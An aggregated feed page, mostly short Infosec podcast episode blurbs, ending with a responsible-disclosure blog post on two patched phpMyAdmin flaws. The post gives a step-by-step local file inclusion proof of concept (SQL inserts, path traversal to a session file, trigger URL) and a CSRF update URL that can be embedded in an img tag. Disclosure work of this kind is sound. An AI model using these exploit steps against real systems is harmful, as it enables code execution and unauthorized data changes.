❌

Normal view

There are new articles available, click to refresh the page.
Before yesterdayPentest/Red Team

How to Become a Security Architect | Guest Leighton Johnson

By: Infosec
26 July 2018 at 13:00

Learn about the life of a security architect in this discussion with Leighton Johnson, the CTO and founder of ISFMT (Information Security Forensics Management Team). Leighton discusses how you can become a security architect, the typical job responsibilities and common pitfalls you may face, certifications that can help advance your security architect career, how security architecture is evolving, and more.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

The $9 Billion BEC Threat You Can’t Ignore | Guests Roger Sels and Jack Koziol

By: Infosec
3 August 2018 at 11:00

Business email compromise (BEC) attacks are expected to cost businesses $9 billion by the end of 2018, according to Trend Micro estimates. In this discussion with Roger Sels, VP information security at DarkMatter, and Jack Koziol, CEO of Infosec Institute, you'll learn more about BEC attacks and measures you can take now to protect your organization. Kristin Zurovitch, director of marketing at Infosec Institute, helps guide the discussion and takes listener questions.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

How to Become an Incident Responder | Guest Keatron Evans

By: Infosec
6 August 2018 at 11:00

Learn about the path to becoming an incident responder and what a potential career may entail in this discussion with Keatron Evans, Infosec Institute instructor and managing consultant at KM Cyber Security, LLC. Evans discusses his path to incident response, what kinds of interests can translate into a successful incident response career, and what a day in the life as an incident responder is like.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

PMP Certification: Boost Your Career and Earn More Money | Guest Chris Danek

By: Infosec
10 August 2018 at 14:05

Earning your PMP certification can increase your earnings by as much as 20 percent. A Project Management Professional (PMP) certification proves to employers that you know what it takes to manage projects efficiently, within budget and on schedule. Infosec Institute instructor Chris Danek and sales manager Jarrod Mayes discuss how the PMP certification process works and how it can help build your credibility in any industry. Kristin Zurovitch, director of marketing at Infosec Institute, helps guide the discussion and takes listener questions. I

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

The Problem with Passwords | Guest Susan Morrow

By: Infosec
13 August 2018 at 11:00

Passwords remain at the heart of many cybersecurity issues, and this week we take a deep dive into the topic with Susan Morrow, who has worked in numerous areas of the IT security industry since the early 1990s. Morrow discusses the new NIST password guidelines, how organizations are lagging behind, and a variety of other password-related topics. The InfoSec Institute security awareness series highlights the importance of security education across all levels of an organization.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

Privacy Certifications Boosted by New Regulations | Guest Aaron Stevens

By: Infosec
17 August 2018 at 15:10

California’s new privacy law will affect more than half a million U.S. companies when it goes into effect on January 1, 2020 β€” and that's just one piece of the evolving privacy landscape. In this discussion with IAPP channels manager Aaron Stevens, we discuss how organizations are being impacted by privacy regulations, the surging popularity of privacy certifications, and how an IAPP privacy certification can help boost your career.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

How to Become a Computer Forensics Investigator | Guest Amber Schroader

By: Infosec
20 August 2018 at 11:00

Paraben CEO Amber Schroader discusses her path to becoming a computer forensics investigator and provides advice to those who may be considering computer forensics as a career. Schroader talks about the challenges of the field, the misconceptions and growth brought about by TV shows, and the fact that forensics is a science rather than an art.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

CRISC Roadmap: The Highest-Paying Certification | Guest Leighton Johnson

By: Infosec
24 August 2018 at 11:00

Professionals with the Certified in Risk and Information Systems Control (CRISC) certification earn an average of $127,507 each year, making it the highest-paying IT certification available. Leighton Johnson, the CTO of Information Security Forensics Management Team and a CRISC-certified professional, discusses how earning your CRISC can open new career opportunities, as well as what the CRISC certification process is like. Kristin Zurovitch, director of marketing at Infosec Instiute, helps guide the discussion and takes listener questions.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

Post GDPR Best Practices | Guest Susan Morrow

By: Infosec
27 August 2018 at 14:44

It's been three months since the EU's General Data Protection Regulation (GDPR) went into effect. Returning guest Susan Morrow and host Chris Sienko take a look back at the initial rollout of GDPR, the compliance steps organizations have taken so far, and the potential future impact of GDPR.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

How to Become a Network Admin | Guest Elias Papatestas

By: Infosec
1 September 2018 at 15:34

Learn about the path to becoming a network admin and what a potential career may entail in this discussion with Elias Papatestas, an Infosec Institute instructor who has extensive history in the IT industry dating back to the 1980s.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

Cybersecurity Startups and Minority Representation | Guest Ron Gula

By: Infosec
8 September 2018 at 20:44

Ron Gula, president of Gula Tech Adventures and co-founder of Tenable Network Security, talks about the evolution of cybersecurity and security awareness, his career shift from the NSA to growing Tenable to funding other cybersecurity startups, and a variety of other topics.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

Healthcare’s Many Cybersecurity Challenges | Guest Lisa Hedges

By: Infosec
16 September 2018 at 14:50

Lisa Hedges, content analyst at Software Advice, Gartner Digital Markets, talks about the many cybersecurity challenges facing the healthcare sector.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

CISSP Exam Changes: Tips to Pass the New CAT Format (and Free E-book) | Guest Ken Magee

By: Infosec
25 September 2018 at 11:19

Learn everything you need to pass the new CISSP exam in this discussion with InfoSec Instructor Ken Magee.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

Turn the Tables on Your Attackers with Deception Technology | Guest Carolyn Crandall

By: Infosec
28 September 2018 at 11:16

Chief deception officer Carolyn Crandall talks about using deception technology to trick attackers and protect organizations.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

Defending Against and Recovering from Ransomware | Guest Bill Siegel

By: Infosec
5 October 2018 at 13:23

Bill Siegel, co-founder of ransomware-recovery company Coveware, discusses ransomware trends.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

Midterm Elections, Hacking and Information Warfare | Guest John Dickson

By: Infosec
12 October 2018 at 10:00

John Dickson, Principal at Denim Group, talks about cybersecurity issues related to the upcoming midterm elections.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

Get Started in Cybersecurity: Beginner Tips, Certifications and Career Paths | Guest Keatron Evans

By: Infosec
23 October 2018 at 12:39

Cybersecurity professional Keatron Evans shares tips for those looking to break into the industry or change careers.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

New Phishing Trends, Old Tactics and Security Awareness | Guest Pedram Amini

By: Infosec
26 October 2018 at 13:54

Pedram Amini, creator of the Zero Day Initiative, talks about howΒ  phishing has changed β€” and stayed the same β€” over recent years.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

How is Cybercrime Impacting the Financial Sector? | Guest Todd Weller

By: Infosec
3 November 2018 at 01:09

Todd Weller, chief strategy officer at Bandura Systems, discusses cybercrime in the financial sector and how to build a security awareness program on a budget.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

Developing Security Champions within DevOps | Guest Ty Sbano

By: Infosec
9 November 2018 at 10:10

Ty Sbano, head of security at Periscope Data, talks about building Security Champions in the world of DevOps.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

Securing the Internet-of-Things (IoT) | Guest Dr. Jared DeMott

By: Infosec
16 November 2018 at 12:25

Dr. Jared DeMott, CEO and founder of VDA Labs, chats about the security risks associated with the Internet of Things (IoT).

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

Transform Your Organization with a Security Champion | Guest Jeff Williams

By: Infosec
21 November 2018 at 10:00

OWASP co-founder Jeff Williams discusses how developing a Security Champion can make your organization more secure.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

Are Third-Party Vendors Your Biggest Cybersecurity Risk? | Guest Fred Kneip

By: Infosec
30 November 2018 at 11:53

Fred Kneip, CEO of CyberGRX, discusses the growth of risk from third-party vendors.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

Drilling Holes in ATMs, Card Skimming and Other Fraud | Guest Stan Engelbrecht

By: Infosec
7 December 2018 at 08:00

Stan Engelbrecht, director of cyber security practice for D3 Security, discusses ATM fraud.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

10 Proven Security Awareness Tips From Osterman Research | Guest Michael Osterman

By: Infosec
10 December 2018 at 09:00

Michael Osterman, president and analyst at Osterman Research, shares security awareness tips and strategies

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

πŸ’Ύ

PHPMyAdmin multiple vulnerabilities

By: blogscrt
14 December 2018 at 10:34

During an assignment, I found several serious vulnerabilities in phpMyAdmin, which is an application massively used to manage MariaDB and MySQL databases.Β One of them potentially leads to arbitrary code execution by exploiting a Local file inclusion, while the other is a CSRF allowing any table entry to be edited.

1. Local File INCLUSION in transformation feature

The transformation feature from PHPMyAdmin allows to have a specific display for some columns when selecting them from a table. For example, it can transform links in text format to clickable links when rendering them.

Those transformations are defined in PHPMyAdmin’s β€œcolumn_info” system table, which usually resides in the phpmyadmin database. However, every database can ship its own version of phpmyadmin system tables. For creating phpmyadmin system tables for a specific database, the following call can be used: http://phpmyadmin/chk_rel.php?fixall_pmadb=1&db=*yourdb*.
It will create a set of pma__* tables into your database.

Here is an example of how the transformation is applied, from tbl_replace.php:

<?php

$mime_map = Transformations::getMIME($GLOBALS['db'], $GLOBALS['table']);
[...]
// Apply Input Transformation if defined
if (!empty($mime_map[$column_name])
&& !empty($mime_map[$column_name]['input_transformation'])
) {
   $filename = 'libraries/classes/Plugins/Transformations/'
. $mime_map[$column_name]['input_transformation'];
   if (is_file($filename)) {
      include_once $filename;
      $classname = Transformations::getClassName($filename);
      /** @var IOTransformationsPlugin $transformation_plugin */
      $transformation_plugin = new $classname();
      $transformation_options = Transformations::getOptions(
         $mime_map[$column_name]['input_transformation_options']
      );
      $current_value = $transformation_plugin->applyTransformation(
         $current_value, $transformation_options
      );
      // check if transformation was successful or not
      // and accordingly set error messages & insert_fail
      if (method_exists($transformation_plugin, 'isSuccess')
&& !$transformation_plugin->isSuccess()
) {
         $insert_fail = true;
         $row_skipped = true;
         $insert_errors[] = sprintf(
            __('Row: %1$s, Column: %2$s, Error: %3$s'),
            $rownumber, $column_name,
            $transformation_plugin->getError()
         );
      }
   }
}

The transformation is fetched from the β€œpma__column_info” system table in the current database, or from the β€œphpmyadmin” database instead. The β€œinput_transformation” column is used as a filename to include, and is vulnerable to a path traversal that leads to a local file inclusion.

Here is a PoC to exploit this vulnerability:

  1. Create a new database β€œfoo” with a random β€œbar” table containing a β€œbaz” column, with a data containing PHP code in it (to fill the session with some php code):
    CREATE DATABASE foo;
    Β CREATE TABLE foo.bar ( baz VARCHAR(255) PRIMARY KEY );
    Β INSERT INTO foo.bar SELECT '<?php phpinfo() ?>';
  2. Create phpmyadmin system tables in your db by calling http://phpmyadmin/chk_rel.php?fixall_pmadb=1&db=foo
  3. Fill the transformation information with the path traversal in the β€œpma__column_info” table:
    INSERT INTO `pma__column_info`SELECT '1', 'foo', 'bar', 'baz', 'plop',
    Β 'plop', 'plop', 'plop',
    Β '[path_traversal]/var/lib/php/sessions/sess_{yourSessionId}','plop';
  4. Browsing toΒ http://phpmyadmin/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1 will trigger the phpinfo(); call.

Β 

2. CSRF for updating data in table

This vulnerability is pretty easy to understand. A simple GET request can be used to update data in a table. Here is an example :

http://phpmyadmin/tbl_replace.php?db=*yourDB*&table=*yourTable*&fields_name[multi_edit][0][0]=*fieldToEdit*&fields[multi_edit][0][0]=*fieldNewValue*&clause_is_unique=1&where_clause=*whereClause*

A malicious user could force a logged-in user to update arbitrary tables in arbitrary DBs. This can also be used in a simple <img> element on forums or elsewhere, as the request is a simple GET one.

Β 

These vulnerabilities are both important. We responsibly disclosed them and theyΒ  were patched on the newly released phpMyAdmin 4.8.4.

Β 

Timeline :

  • 2018.06.21 – Initial contact with phpMyAdmin security team.
  • 2018.06.24 – Initial response that the team will investigate.
  • 2018.08.02 – Request for news.
  • 2018.08.28 – Re-request for news.
  • 2018.08.31 – Response from phpMyAdmin team that they’re still in the process of fixing things.
  • 2018.11.01 – Request for news.
  • 2018.12.07 – Apologies from phpMyAdmin + explanation that a lot of code rewrite was necessary for multiple CSRF flaws.
  • 2018.12.11 – New version released with patch.

Update your things! πŸ˜‰

❌
❌